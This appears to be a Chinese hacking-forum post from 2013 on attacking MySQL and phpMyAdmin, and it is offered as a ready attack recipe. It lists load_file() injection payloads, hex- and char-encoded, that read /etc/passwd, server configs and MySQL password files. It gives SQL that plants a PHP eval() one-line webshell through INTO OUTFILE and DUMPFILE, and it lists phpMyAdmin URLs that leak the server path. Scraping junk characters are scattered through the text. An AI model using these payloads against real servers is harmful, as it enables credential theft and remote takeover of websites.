中国网络渗透测试联盟
标题:
利用load_file()获取敏感文件与phpmyadmin拿webshell
[打印本页]
作者:
admin
时间:
2013-7-13 19:27
标题:
利用load_file()获取敏感文件与phpmyadmin拿webshell
利用load_file()获取敏感文件与phpmyadmin拿webshell
& \4 ~- U ~- R" H# X) h( A8 d
针对MYSQL数据注入时用到的 load_file()函数对其文件查看的相关路径: 1、 replace(load_file(0x2F6574632F706173737764),0x3c,0x20) 2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32)) 上面两个是查看一个PHP文件里
; ]* `) G8 f3 k0 ]7 ?+ |3 c
针对MYSQL数据注入时用到的 load_file()函数对其文件查看的相关路径:
) F1 C$ @) w0 I' N# ^& |
6 z6 j* k4 p3 f
1、 replace(load_file(0x2F6574632F706173737764),0x3c,0x20)
) W. [5 L, _" `6 q& A; t1 `
2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
" f1 @: f* r3 U8 O9 y
上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 < 替换成空格 返回的是网页.而无法查看到代码.
/ U0 `7 Y% G* w# r( g1 ^& P
3、 load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
" d% V( j; U8 b" V- Q
4、/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
# ?3 ]( W+ P: I' p: {% R1 e! d0 g
5、crogram FilesApache GroupApacheconf httpd.conf 或C:apacheconf httpd.conf 查看WINDOWS系统apache文件
2 e% d+ n I6 w$ \$ X1 j2 o/ ?8 I
6、c:/Resin-3.0.14/conf/resin.conf 查看jsp开发的网站 resin文件配置信息.
: S% U) ~7 Y; g0 r8 b
7、c:/Resin/conf/resin.conf /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
, ]% o" r, k& T# W+ e: Z& O
8、d:APACHEApache2confhttpd.conf
R4 B0 L% x" T7 h% Y, ^
9、Crogram Filesmysqlmy.ini
) x7 o' e7 y8 K3 A' Z' N
10、../themes/darkblue_orange/layout.inc.php phpmyadmin 爆路径
! _ N5 P$ @+ P2 e
11、 c:windowssystem32inetsrvMetaBase.xml 查看IIS的虚拟主机配置文件
& N% |& G- B" o1 o |
12、 /usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的RESIN配置文件查看
' R1 o/ X) x. x$ a9 ]( R8 S9 W
13、 /usr/local/resin-pro-3.0.22/conf/resin.conf 同上
# N4 o. Y6 \( U! E
14 、/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
9 E9 X- r# \* I# V
15、 /etc/sysconfig/iptables 本看防火墙策略
& d& Z$ z8 t: j+ G9 a
16 、 usr/local/app/php5/lib/php.ini PHP 的相当设置
( W9 M# } D8 N( ]) c3 V
17 、/etc/my.cnf MYSQL的配置文件
1 P3 P3 u* T4 l6 ?, T
18、 /etc/redhat-release 红帽子的系统版本
, E$ E6 v# Y9 s6 o; r4 a4 M) s
19 、C:mysqldatamysqluser.MYD 存在MYSQL系统中的用户密码
! Q: h4 ~, j5 h
20、/etc/sysconfig/network-scripts/ifcfg-eth0 查看IP.
/ Z) w/ d8 Y6 {4 ~
21、/usr/local/app/php5/lib/php.ini //PHP相关设置
- l+ A9 A e; d3 L; E5 _$ a
22、/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
3 v' [* A0 d& Y# @7 N9 \
23、crogram FilesRhinoSoft.comServ-UServUDaemon.ini
) f$ S+ T. |4 t+ p% X, D
24、c:windowsmy.ini
: f$ k5 |6 i2 ?% ?
---------------------------------------------------------------------------------------------------------------------------------
: ]3 O+ J4 \0 @& }( n
1.如何拿到登陆密码. 自己想办法
# o, @! L* y7 K1 E) V9 A8 i0 s
2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.
' h1 }; z9 p2 c `
3.选择一个Database.运行以下语句.
1 A7 s, E/ S" X1 x. R4 x& Y
----start code---
1 P. o8 r. ]( }1 Z2 h
Create TABLE a (cmd text NOT NULL);
% ~& Y0 _/ z. [5 i; Q) O3 E1 x' {! h
Insert INTO a (cmd) VALUES('<?php eval($_POST[cmd]);?>');
/ O0 u% v5 T6 X! E" K( g, ~' v4 C. ?
select cmd from a into outfile 'x:/phpMyAdmin/libraries/d.php';
. w' A. _. M) H4 i: A
Drop TABLE IF EXISTS a;
) O- h. A7 {9 A( Y% W& F
----end code---
# v4 y1 V" r' g0 J. y
4.如果没什么意外.对应网站得到webshell
( A7 c9 y/ j* f; b
思路与mssql一样,都是建个表,然后在表中插一句话木马,在导出到web目录!
N9 K4 ]" p' P7 d0 j3 f
补充:还可以直接用dumpfile来得到shell
! M# J8 g9 v. L6 l7 l' r/ x
select 0x3c3f706870206576616c28245f504f53545b636d645d293f3e into DUMPFILE 'C:/XXX/php.php';
; r" p G8 U6 T" J: r
加密部分为 lanker 一句话 密码为 cmd
4 E) [: A& }/ y) ^7 r
--------------------------------------------------------------------------------------------------------
l0 U5 ^8 ]8 H7 ~ q' n
phpmyadmin的libraries目录多个文件存在绝对路径泄露漏洞- -
! o& t0 A3 E0 G+ U% E5 y
2 G6 p- j/ c- u4 _2 H
http://target/phpmyadmin/libraries/string.lib.php
; I) P8 x6 }' J; Y, c
http://target/phpmyadmin/libraries/string.lib.php
- I1 @, B8 p( _ A4 p$ r7 D. M
http://target/phpmyadmin/libraries/database_interface.lib.php
' K: I0 h3 J0 j- F/ Z0 @2 g4 B
http://target/phpmyadmin/libraries/db_table_exists.lib.php
8 i( ?, u1 C6 X3 o; C' E% p0 J
http://target/phpmyadmin/libraries/display_export.lib.php
# {- ~0 t% @0 V8 s% {! H
http://target/phpmyadmin/libraries/header_meta_style.inc.php
- d1 {6 ]3 M& Z7 k
http://target/phpmyadmin/libraries/mcrypt.lib.php
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2